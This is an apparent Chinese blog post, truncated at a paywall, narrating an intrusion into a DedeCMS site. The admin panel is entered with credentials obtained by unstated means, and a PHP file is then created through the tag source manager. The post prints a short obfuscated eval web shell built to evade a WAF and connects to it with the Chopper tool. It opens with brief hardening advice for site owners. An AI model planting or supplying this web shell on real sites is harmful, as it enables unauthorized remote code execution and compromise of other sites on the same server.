本文讲述了对一个DedeCMS站点的渗透过程,通过标签源码管理创建PHP脚本,利用文件权限漏洞进行旁注,尽管服务器安全措施强化,但仍有漏洞可寻。提醒DedeCMS用户修改后台路径,限制权限,并注意数据盘权限可能带来的安全隐患。
一系列故事的开端:
这是搜到的一个Dede站点的后台
路径为/dede
获得到该站点的用户名以及密码后(这里不具体说明),输入用户名和密码之后就进入了后台,并且下意识的打开了文件管理器
不过管理员也不是等闲之辈,早已卸载该模块
于是,我找到了另一处可以生成PHP文件的地方
在”标签源码管理“这里可以创建PHP脚本文件
去掉默认的代码,写入eval代码,点击保存,文件会存放在 /include/taglib 目录下
注:由于服务器有WAF,PHP脚本进行了简单的混淆
<?php
$a='b';
$b=$_POST['x'];
eval($$a);
?>于是菜刀连接之:
刚开始看到其他站点目录无权限时,并没有想
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
